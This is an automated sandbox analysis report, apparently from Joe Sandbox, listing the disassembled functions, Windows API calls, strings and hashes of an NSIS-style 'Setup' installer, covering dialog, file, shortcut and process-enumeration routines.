Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

M, xrefs: 00404B43
N, xrefs: 00404C06
, xrefs: 00404F39
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

82D, xrefs: 004046DB
A, xrefs: 00404636
@rD, xrefs: 00404610
@%F, xrefs: 00404674

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
%s: failed opening file "%s", xrefs: 00406F0C
name, xrefs: 00406FBF

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
Delete: DeleteFile("%s"), xrefs: 00406DBC
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
\*.*, xrefs: 00406D03
Delete: DeleteFile failed("%s"), xrefs: 00406DFD

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

Kernel32.DLL, xrefs: 0040659B
CreateToolhelp32Snapshot, xrefs: 004065B5
EnumProcesses, xrefs: 00406482
PSAPI.DLL, xrefs: 00406464
Process32FirstW, xrefs: 004065BD
GetModuleBaseNameW, xrefs: 00406494
EnumProcessModules, xrefs: 0040648A
Module32NextW, xrefs: 004065DE
Module32FirstW, xrefs: 004065D3
Process32NextW, xrefs: 004065C8
Unknown, xrefs: 004064FC

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
@%F, xrefs: 004042A7
N, xrefs: 0040426C

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

[Rename], xrefs: 00406BC8, 00406BD7
%s=%s, xrefs: 00406B43
F, xrefs: 00406AE8
NUL, xrefs: 00406A9E

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
